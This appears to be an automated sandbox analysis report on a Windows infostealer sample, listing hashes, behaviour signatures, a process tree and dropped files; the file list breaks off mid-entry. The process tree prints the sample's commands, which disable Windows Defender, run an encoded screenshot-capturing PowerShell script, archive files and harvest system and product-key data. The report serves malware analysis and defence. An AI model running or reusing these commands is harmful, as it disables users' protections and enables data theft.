Analysis

  • max time kernel
    107s
  • max time network
    118s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250410-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250410-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15/04/2025, 18:59

General

  • Target

    turan k$yser [email protected]

  • Size

    7.8MB

  • MD5

    94dd93a1e09594567ba2f0bc1af13927

  • SHA1

    3d32ca71a96033eb2f9bfe18d9ae7eceea1d1951

  • SHA256

    79bdb910cdbac46bd809d30d00fbffbc4ec040e1149db4e3bd2675bfc7f1cfef

  • SHA512

    e03268ad5a8f23eb2ddaa0a7488b26291360dc5ad52500f4e058ca90be61c8f91e4d61a3e4bbcac3331b6c53dafd6b827b5a60d653a40a0d593ea6aaa818fde8

  • SSDEEP

    196608:KW5HUOXXKApTj9fZwQRCgiIKpdzjPOan7j2y283TOnOt:dxBw8wIKppDO9it

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • UPX packed file 49 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\turan k$yser [email protected]
    "C:\Users\Admin\AppData\Local\Temp\turan k$yser [email protected]"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2180
    • C:\Users\Admin\AppData\Local\Temp\turan k$yser [email protected]
      "C:\Users\Admin\AppData\Local\Temp\turan k$yser [email protected]"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2964
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\turan k$yser [email protected]'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:460
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\turan k$yser [email protected]'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1588
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4480
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1240
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2740
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4988
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3940
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2264
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2200
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1696
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lsvlbhva\lsvlbhva.cmdline"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:336
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8EA3.tmp" "c:\Users\Admin\AppData\Local\Temp\lsvlbhva\CSC9544EC9948C84EC6B35724D927717A32.TMP"
              6⤵
                PID:3316
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI21802\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\Kfgcs.zip" *"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1044
          • C:\Users\Admin\AppData\Local\Temp\_MEI21802\rar.exe
            C:\Users\Admin\AppData\Local\Temp\_MEI21802\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\Kfgcs.zip" *
            4⤵
            • Executes dropped EXE
            PID:3988
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic os get Caption"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3836
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic os get Caption
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1480
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3992
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic computersystem get totalphysicalmemory
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4200
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:556
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
              PID:2012
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:5100
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1672
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2136
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:1548
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3448
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:208

      Network

      MITRE ATT&CK Enterprise v16

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        0d95621f05cfdf1332d6f39c2f62c8fd

        SHA1

        b7b0762a256c6763314a7453c754a0225e39aae0

        SHA256

        2ae6e3f473d1bb5d3fb350e7f4361420068d8fc4ca9bb770d8d97c946217e553

        SHA512

        81c5e7f8b96d46ca7db6385e68ed95af85d4751d79b67b88f63bb516d3529f116cac0bf18841bc89da8c6e2fced76ef1cc892bc806461fa2eb8f4303647dabae

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        216727b9ec13259df420e4abd46fc7c0

        SHA1

        f961e911f3fbc2bf80d1fcf147a8cd4cc53d6cc7

        SHA256

        20d710f9a0219a514759d473ccae287c53a99cdd292f069b09d7e6f5b4624484

        SHA512

        a409961cfe8d92d927713af5fae225b42cc8b701fc762e62343a4309296c9232acf8514fd8d9c04805a7f652864767738edb453c12183a49dcdb606bef0d58d8

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        64B

        MD5

        1a11402783a8686e08f8fa987dd07bca

        SHA1

        580df3865059f4e2d8be10644590317336d146ce

        SHA256

        9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

        SHA512

        5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

      • C:\Users\Admin\AppData\Local\Temp\Kfgcs.zip

        Filesize

        423KB

        MD5

        69d001b512068b4a0a083701dc73a973

        SHA1

        b8d0f12e61c846b819fb32d6340fd10ddf04a317

        SHA256

        18b072d4258af8340c60e43b79c9892046accbe37978de1aa29a0ce744fb44ba

        SHA512

        95d4f281d28c312c1de517a7aaf666ba705aeaefd686b015369c5cd2bdfe7ea052fccb736d81025fd80a87d2cf9fefcdfa2a670400b01fc9bfaf698cd94dc94e

      • C:\Users\Admin\AppData\Local\Temp\RES8EA3.tmp

        Filesize

        1KB

        MD5

        054dd3d2d3637b653cb7f3d3f53fca31

        SHA1

        010df7653753577198c70f058c9ead2bf7d0b0c2

        SHA256

        9aab36efa5378725ff89834d8cfa21e290b58f75de4ce78d7d8b86da33856681

        SHA512

        0e1242b8e6f7face2684a201908d207e8511bcbbae8486f69011bb1acf9656c507cfec2786bf1d3011e3eb84519ea948db28c269a4a1c13261ad40c729c4cc28

      • C:\Users\Admin\AppData\Local\Temp\_MEI21802\VCRUNTIME140.dll

        Filesize

        117KB

        MD5

        32da96115c9d783a0769312c0482a62d

        SHA1

        2ea840a5faa87a2fe8d7e5cb4367f2418077d66b

        SHA256

        052ad6a20d375957e82aa6a3c441ea548d89be0981516ca7eb306e063d5027f4

        SHA512

        616c78b4a24761d4640ae2377b873f7779322ef7bc26f8de7da0d880b227c577ed6f5ed794fc733468477b2fcdb7916def250e5dc63e79257616f99768419087

      • C:\Users\Admin\AppData\Local\Temp\_MEI21802\_bz2.pyd

        Filesize

        49KB

        MD5

        d445b66c80c38f484dfd22c5bc99bfd6

        SHA1

        381644ec27f4874031401de9b994acfd8ddf6867

        SHA256

        44afb5ec148a9019f80e976c0649f9e4510cc4fc327b40019cd79cc019f6f6e6

        SHA512

        b25c142eb61246ed758e3cd347e32b22b34b3c7558e9929d9710433b6130e52d8a8f6906d1f69a2752771358967a945db9f064f1d0a6ab9db5eecbe33c2df8c8

      • C:\Users\Admin\AppData\Local\Temp\_MEI21802\_ctypes.pyd

        Filesize

        64KB

        MD5

        8ab8af95f0000bfd777d2e9832414d71

        SHA1

        a848d37a9a4bab18d5f90376a0098189dc653232

        SHA256

        2a94e57d22451726434544e1f8082c0e379e4ba768bfe7f7ada7db1d5b686045

        SHA512

        adbb5cc31d5ed019d4a5f527d7af14142cb200cf9497de9f1e36219a5db61abfb9b0a1799bce7c7c8c2ae36612420e95a38a6cf3119b5a0653ed3b9aa1a56dc5

      • C:\Users\Admin\AppData\Local\Temp\_MEI21802\_decimal.pyd

        Filesize

        118KB

        MD5

        423d3c24a162c2f70e9862a446c5969a

        SHA1

        af94fc884d7abababf511a51d236962268e9be78

        SHA256

        eca8f9814896d44fb6f2ec31d1230b777be509f7f41640b7680df6f609e4de9c

        SHA512

        75c4b5119ca8b32d633a647d2adccb8c43857de523d4cb7a8c7b9d3c1f45e927f1efcfee26ab8fc7741bf83eef30c4dc4c558be40eff1e03f060b6cecf77d123

      • C:\Users\Admin\AppData\Local\Temp\_MEI21802\_hashlib.pyd

        Filesize

        36KB

        MD5

        5f64eb23eed56e87b1e21f0790e59ba0

        SHA1

        95c5c3b7a6f322c07fe2dcdb3956bad7a5c35e09

        SHA256

        c3668794821c205b7de2ae1dd4c1feda18e2070a2ecc9ed6b6699234d5fc6b60

        SHA512

        494c5466c8971d64a4489b939bbb2978676b4abd7836478ac90bd09e7e084ddd5b4f459aeba588d12fbebceaca0d7fcd5f900172bad41c16f2d7f78c48c17490

      • C:\Users\Admin\AppData\Local\Temp\_MEI21802\_lzma.pyd

        Filesize

        87KB

        MD5

        04ae3bb5f79fc405c70ab54645778c5a

        SHA1

        16b37028d52088ee4aa7966f1748b5f74d23409b

        SHA256

        dfe06ccb200a88e14cbdb9ebce03f704c0681f258187a19e638ce63290439194

        SHA512

        6fe41755c1b2cc2e363bb92ab8633f28f4e4938c88b7356b931e1f3511e68cd80693d71c729e233eadbef87e055538b8776d20ed54b64a2ae2df457d4acc840e

      • C:\Users\Admin\AppData\Local\Temp\_MEI21802\_queue.pyd

        Filesize

        28KB

        MD5

        092de95c7338c37287b5ab0d580b26a1

        SHA1

        64b128f4deab8ec80be1b7eab3168b7af02d405b

        SHA256

        62290258f4e11c2293ee2602b4aaa1b12e00cd05c2d994d8476089f2d5299f9b

        SHA512

        f43df57e1998e170ab41129ebc90ca4d313f46cdc7e7abfce535fc2f0502f26ed6de5485f2831d00256180432cac7ef9a24df7b627c4e70b0b62eae750145ae5

      • C:\Users\Admin\AppData\Local\Temp\_MEI21802\_socket.pyd

        Filesize

        45KB

        MD5

        a3e17f70f84e2b890d6382076573103b

        SHA1

        a0b429ee060f44987e1e48b75cd586e17e6ec3ec

        SHA256

        814981c6946fa14fab60433096062458afb990901344ea9d598d7872aee9d320

        SHA512

        39a6199ddb7e4eba080616cdc070260c3a6a9c047c211c74f311c8ef1e2aa058a182984b43d33febaaba518f1bdbea66b2be6ee05642d319115280e7007470da

      • C:\Users\Admin\AppData\Local\Temp\_MEI21802\_sqlite3.pyd

        Filesize

        59KB

        MD5

        0ea6bb0d33c7ba53ea512292f03dc40d

        SHA1

        8deddea61c28855f9e5f8ffbc881cc5577fd482d

        SHA256

        74ab9c9394361a0dbf9251aa296b6349597450dc4abb0648c067e7797ca92b8d

        SHA512

        487449c4ee2f9478271c74352e2a3ab2b3b9e42ced4a51f490a4c1db0a652d98ee622a55867f14cab90700f77daf0b7c5fec67d8d3038b3ac5c5782dbc4dd808

      • C:\Users\Admin\AppData\Local\Temp\_MEI21802\_ssl.pyd

        Filesize

        68KB

        MD5

        0940325d7409d9d7d06def700ea2b96e

        SHA1

        0254073164eedef15e9eca4047b93c81ba113554

        SHA256

